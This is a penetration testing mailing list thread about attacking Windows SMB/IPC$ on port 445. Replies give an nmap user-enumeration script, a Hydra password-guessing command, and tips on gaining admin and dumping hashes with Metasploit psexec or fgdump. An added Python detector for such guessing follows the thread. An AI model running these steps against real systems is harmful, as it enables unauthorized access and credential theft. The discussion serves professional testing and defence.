Penetration Testing mailing list archives
Exploiting IPC$
From: "Adrian Puente Z." <apuente () hackarandas com>
Date: Tue, 05 Jan 2010 22:48:35 -0600
I recommend SuperScan4 that runs on Windows.
http://www.foundstone.com/us/resources/proddesc/superscan.htm

I also use this bash script that runs with Nmap Version 5.00 or later in BackTrack.

    # Run the nmap smb-enum-* scripts against one host and turn the user list
    # into CSV files. Usage: nmapenumsmb <IP>
    function nmapenumsmb {
      if [ $# -eq 0 ]
      then
        echo -e "Sintaxis: nmapenumsmb <IP>"
        return 1    # return, not exit: the function is sourced from ~/.bashrc
      fi
      # -oA writes nmap.enum.<IP>.nmap / .gnmap / .xml
      `which nmap` -n -d -p445 --script='smb-enum*' -vv -oA nmap.enum.$1 $1
      echo Getting users
      # CSV header (the ">" redirections were stripped in the archived copy; restored here)
      echo "Login;Type;Domain;RID;Full Name;Description;Flags;Source" > nmap.enum.users.notdisabled.$1.csv
      # Take each "Type: User" record (1 line before, 6 after) from the normal output,
      # join it onto one line, drop disabled accounts and turn "key: value" into ';' fields
      grep -B1 -A6 -e 'Type: User' nmap.enum.$1.nmap | tee nmap.enum.usuarios.$1.txt \
        | tr -d '\n' | sed 's/|\ \ [a-zA-Z0-9]/\n&/g;s/^|\ \ //g;s/|\ \ \ \ |_\ /;/g' | grep -v "Account disabled" \
        | sed 's/^|\ \ //g;s/|\ \ \ \ |_\ /;/g;s/:\ /;/g' | cut -d\; -f1,3,5,7,9,11,13,15,17 \
        | grep \;User\; | tee -a nmap.enum.users.notdisabled.$1.csv \
        | grep -ve '\$' > nmap.enum.users.notdisabled.notmachines.$1.csv   # machine accounts end in "$"
    }

You add it to your ~/.bashrc and run it as nmapenumsmb IP and generate some pretty CSV files with the enumeration information.

Or just

    nmap -n -d -p445 --script=smb-enum* -vv -oA nmap.enum.IP IP

You can also use Cain from www.oxid.it to make the SID brute force user enumeration.

Then I use Hydra to test the users for same or null passwords. It always works. Then you can use SuperScan to know who's Admin.

    hydra -w 10 -V -L lst.users.1.per.line -es -o passwods.hydra.txt IP smbnt -m GROUP:Domain.com.mx -m D

If you get Admin I recommend Metasploit with the smbpsexec module or fgdump from foofus to get control/hashes of the machine.

Have fun

On Wed, Dec 30, 2009 at 5:38 AM, Halley Souza <souza.halley () gmail com> wrote:
Try nmap scripts smb-enum-shares and smb-brute, always result =)

Halley

2009/12/29 Jerome Athias <jerome.athias () free fr>:

scan/check for administrative shares Admin$ C$
(you can find a ton of tools for this task)
then you can try a bruteforce attack
https://www.securinfos.info/outils-securite-hacking/ipc$crack.rar
THCHydra
...
RPC/DCOM sploits
Metasploit Framework

G00D L\_/CK And Happy New Hacking Y3aR!
/JA

On 28/12/2009 12:11, Himanshu Goyal wrote:

Hello,
Can somebody share how to exploit port 445? I am doing a VA and found port 445 open. When I try to connect to IPC$, it says access denied.
Thanks
Cheers-
Himanshu
------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification
Review Board
Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------
--
Adrián Puente Z. [www.hackarandas.com]
Where ideas scatter into bytes...
"... I beg my pride always to keep company with my prudence, and if some day my prudence should fly away, may it at least be able to fly along with my madness" --Nietzsche
Fingerprint: FBD6 4C36 2557 C64C 1318 70A8 F561 CB6F 4E40 5AFB
http://www.hackarandas.com/apuente_at_hackarandas.com.asc.gz
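The password-guessing step this thread describes (Hydra trying null or login-equal passwords over SMB) shows up on the target as a burst of failed network logons for many different accounts from one source. As an added example that is not part of the original thread, this Python script parses constructed Windows Security Event ID 4625 records in a simplified pipe-separated layout (an assumption; real exports differ) and flags any source that fails type-3 logons for many distinct accounts inside a short window.

```python
"""Detect SMB password guessing (many failed network logons from one source) in
Windows Security records. Added example, not part of the original thread."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Event ID 4625 (logon failure) records, simplified to
# "timestamp|event_id|logon_type|source_ip|target_user|status". Logon type 3 is a
# network logon (what SMB/IPC$ auth produces); 0xC000006D = bad user name or password.
SAMPLE_EVENTS = """\
2010-01-05T22:40:01|4625|3|10.0.0.25|administrator|0xC000006D
2010-01-05T22:40:02|4625|3|10.0.0.25|guest|0xC000006D
2010-01-05T22:40:02|4625|3|10.0.0.25|jsmith|0xC000006D
2010-01-05T22:40:03|4625|3|10.0.0.25|mlopez|0xC000006D
2010-01-05T22:40:03|4625|3|10.0.0.25|backup|0xC000006D
2010-01-05T22:40:04|4625|3|10.0.0.25|svc_sql|0xC000006D
2010-01-05T22:41:10|4625|2|10.0.0.7|jsmith|0xC000006D
2010-01-05T22:45:00|4625|3|10.0.0.9|mlopez|0xC000006D
2010-01-05T23:10:00|4625|3|10.0.0.25|jsmith|0xC000006D
"""

def parse_events(text):
    """Yield (time, logon_type, source_ip, user) for each 4625 record."""
    for line in text.splitlines():
        ts, event_id, logon_type, src, user, _status = line.split("|")
        if event_id == "4625":
            yield datetime.fromisoformat(ts), int(logon_type), src, user

def detect_spray(text, window=timedelta(seconds=60), min_users=5):
    """Map source_ip -> sorted distinct accounts for every source whose failed
    network logons (type 3) hit at least min_users accounts inside any sliding
    window of the given length. Console/local failures (other types) are ignored."""
    per_src = defaultdict(list)
    for ts, logon_type, src, user in parse_events(text):
        if logon_type == 3:
            per_src[src].append((ts, user))
    hits = {}
    for src, attempts in per_src.items():
        attempts.sort()
        start = 0
        for end, (ts, _) in enumerate(attempts):
            while ts - attempts[start][0] > window:  # expire attempts older than the window
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) >= min_users and len(users) > len(hits.get(src, ())):
                hits[src] = users
    return {src: sorted(users) for src, users in hits.items()}

if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible SMB password guessing from {src}: {len(users)} accounts tried")
```

The single failure from 10.0.0.9 and the interactive (type 2) failure from 10.0.0.7 are not reported; only 10.0.0.25, which tried six accounts in three seconds, is.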